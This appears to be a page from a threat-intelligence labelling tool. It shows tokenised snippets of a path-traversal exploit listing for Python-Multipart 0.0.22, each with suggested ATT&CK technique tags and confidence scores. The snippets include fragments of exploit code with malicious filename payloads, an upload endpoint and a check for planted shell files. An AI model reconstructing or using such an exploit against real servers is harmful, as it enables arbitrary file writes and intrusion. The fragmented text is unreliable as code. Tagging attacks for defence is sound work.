[webapps] Python-Multipart 0.0.22 - Path Traversal
ATT&CK techniques detected
T1059.006Python
95%
“[ webapps ] python - multipart 0. 0. 22 - path traversal # exploit title : python - multipart 0. 0. 22 - path traversal # date : 2026 - 02 - 23 # exploit author : cardosource # vendor homepage : https : / / github. com / kludex / python - multipart # software link : https : / / p…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
55%
“localhost : 8000 / upload " source _ file = " / etc / hosts " # small file to upload ( content written to target ) if not os. path. exists ( source _ file ) : print ( f " [! ] source file not found : { source _ file } " ) sys. exit ( 1 ) # malicious filenames ( payloads ) payload…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.006Python
38%
“: print ( f " error : { e } " ) print ( " - " * 50 ) time. sleep ( 1. 0 ) print ( " \ n [ * ] done. " ) print ( " verify files in container : " ) print ( " docker exec - it vuln - poc find / - name ' * poc * ' - o - name ' * shell * ' 2 > / dev / null " ) print ( " \ nmitigation …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Python-Multipart 0.0.22 - Path Traversal